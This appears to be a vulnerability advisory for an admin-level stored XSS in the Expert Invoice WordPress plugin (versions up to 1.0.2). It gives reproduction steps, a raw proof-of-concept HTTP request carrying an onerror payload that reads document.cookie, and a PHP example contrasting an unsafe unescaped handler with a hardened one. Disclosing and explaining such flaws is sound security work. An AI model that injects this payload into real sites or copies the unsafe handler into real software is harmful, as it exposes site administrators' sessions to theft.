wpexploit | Guido Iván García Duva | WPEX-ID:65D84E69-0548-4C7D-BCDE-5777D72DA555
History: May 28, 2024 - 12:00 a.m.

Expert Invoice <= 1.0.2 - Admin+ Stored XSS

Tags: expert invoice, stored xss, customer, database, javascript, payload, security vulnerability

AI Score: 5.6 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description: The plugin does not sanitise and escape some of its settings (in this PoC, the customer name), which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).

1. Navigate to Expert Invoice >> Customers >> Add Customer, and set the payload below as the name for this customer:
<img src=x onerror=alert(document.cookie) />
2. Click on "Ok"
3. You will observe that the payload was stored in the database and that, when the customer name is rendered, the JavaScript executes and a pop-up appears.
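The following is an added illustration, not code from the Expert Invoice plugin or from the advisory author. It models the pattern the description refers to (a customer name taken from the admin-ajax request, stored verbatim and echoed back unescaped) as a hypothetical handler, and places the hardened form beside it. The function names, the `ei_demo_customers` table and the `ei_demo_customer` nonce action are assumptions for the example; the WordPress functions used (sanitize_text_field, wp_unslash, esc_html, wp_kses_post, current_user_can, check_ajax_referer, wp_send_json_success, wp_send_json_error, absint) are standard core APIs. The nonce and capability checks are ordinary hardening for any admin-ajax action and are not a claim about whether the plugin performs them.

```php
<?php
/*
 * Added example, not the Expert Invoice plugin's own code.
 * Hypothetical admin-ajax handler for r=customer/create (as in the PoC
 * request) showing the unsafe pattern described in the advisory and a
 * hardened version. Table and nonce names are assumptions.
 */

// --- Unsafe pattern (assumed; reproduces the behaviour the advisory describes) ---
function ei_demo_customer_create_unsafe() {
    global $wpdb;
    $table = $wpdb->prefix . 'ei_demo_customers'; // hypothetical table name
    $wpdb->insert( $table, array(
        'name'        => $_POST['name'],           // stored verbatim: <img src=x onerror=...>
        'is_active'   => (int) $_POST['isActive'],
        'category_id' => (int) $_POST['categoryId'],
    ) );
    wp_send_json_success( array( 'id' => $wpdb->insert_id ) );
}

function ei_demo_customer_row_unsafe( $row ) {
    // Echoed without escaping: the browser parses the stored markup and the
    // onerror= handler fires for every admin who views the customer list.
    echo '<td>' . $row->name . '</td>';
}

// --- Hardened pattern ---
function ei_demo_customer_create_safe() {
    // Standard admin-ajax hygiene: tie the action to a nonce and a capability.
    check_ajax_referer( 'ei_demo_customer', 'nonce' ); // hypothetical nonce action
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // A customer name is plain text: strip all tags on input, regardless of
    // whether the caller holds unfiltered_html. For the PoC payload
    // "<img src=x onerror=alert(document.cookie) />" the tag is removed and
    // nothing remains, so the request is rejected as an empty name.
    $name = isset( $_POST['name'] ) ? sanitize_text_field( wp_unslash( $_POST['name'] ) ) : '';
    if ( '' === $name ) {
        wp_send_json_error( 'name required', 400 );
    }

    // A rich-text field (hypothetical "notes") is where unfiltered_html matters:
    // only users who actually hold that capability may store raw HTML; everyone
    // else is limited to the post-safe allowlist. This mirrors how core treats
    // post content when DISALLOW_UNFILTERED_HTML or multisite removes the cap.
    $notes = isset( $_POST['notes'] ) ? wp_unslash( $_POST['notes'] ) : '';
    if ( ! current_user_can( 'unfiltered_html' ) ) {
        $notes = wp_kses_post( $notes );
    }

    global $wpdb;
    $table = $wpdb->prefix . 'ei_demo_customers';
    $wpdb->insert( $table, array(
        'name'        => $name,
        'notes'       => $notes,
        'is_active'   => ! empty( $_POST['isActive'] ) ? 1 : 0,
        'category_id' => absint( $_POST['categoryId'] ?? 0 ),
    ), array( '%s', '%s', '%d', '%d' ) );
    wp_send_json_success( array( 'id' => $wpdb->insert_id ) );
}

function ei_demo_customer_row_safe( $row ) {
    // Escape on output as well: rows written by a version that did not
    // sanitise input are still in the database and must not be trusted.
    echo '<td>' . esc_html( $row->name ) . '</td>';
    // notes were filtered on input per the caller's capability; wp_kses_post
    // on output re-applies the allowlist to pre-existing rows.
    echo '<td>' . wp_kses_post( $row->notes ) . '</td>';
}
```

The two halves of the fix are independent: sanitising on input stops new payloads from being stored, while escaping on output neutralises anything already in the table, which is why a plugin update alone does not clean up a site that was exploited before patching. Note that for an Admin+ finding the bug is only exploitable as a security boundary violation where unfiltered_html is withheld from administrators (multisite, or DISALLOW_UNFILTERED_HTML); on a single-site install the same admin could already store HTML in post content.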

---
PoC request:

POST /wordpress2/wp-admin/admin-ajax.php?action=expert_invoice_ajax_action&r=customer/create HTTP/1.1
Host: localhost
Content-Length: 97
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/wordpress2/wp-admin/admin.php?page=expert-invoice-customer
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_26136172b2949242d677f08fc280dbe6=guido%7C1715212326%7Cjs91INKy3CE6z1tCQzESsKYWGq768fF5Hf46SBQ4gAc%7Cc13ef996618e006139d94e751ba34d101442ab956a33c2facdba17a698e4d411; manage_fields-tab=3; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_26136172b2949242d677f08fc280dbe6=guido%7C1715212326%7Cjs91INKy3CE6z1tCQzESsKYWGq768fF5Hf46SBQ4gAc%7Ca050752cef05e1a3832ed50a33a2aa337bebc7814f858dcfb4883447acfe4597; tk_ai=woo%3Aj8lkEhzjhae%2BVJK9%2BGu7Hq9m; woocommerce_items_in_cart=1; woocommerce_cart_hash=063c652650410a476899fd4aff956a68; wp_woocommerce_session_26136172b2949242d677f08fc280dbe6=1%7C%7C1714524561%7C%7C1714520961%7C%7Cb87d2e08b2ed77e9b661f3fd7a457cc4; wp-settings-1=e9m120fbrn; wp-settings-time-1=1714362616; PHPSESSID=2vmvusoc212o1iiterrjt5png5; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-04-24%2003%3A26%3A31%7C%7C%7Cep%3Dhttp%3A%2F%2Flocalhost%2Fwordpress%2F%7C%7C%7Crf%3Dhttp%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dchainedquiz_questions%26action%3Dedit%26id%3D2; sbjs_first_add=fd%3D2024-04-24%2003%3A26%3A31%7C%7C%7Cep%3Dhttp%3A%2F%2Flocalhost%2Fwordpress%2F%7C%7C%7Crf%3Dhttp%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dchainedquiz_questions%26action%3Dedit%26id%3D2; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29; selectedTab=settings; themify-builder-tabs=themify-popupt; sbjs_udata=vst%3D11%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F124.0.6367.60%20Safari%2F537.36
Connection: close

name=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)+%2F%3E&isActive=1&isTaxExempt=0&categoryId=1
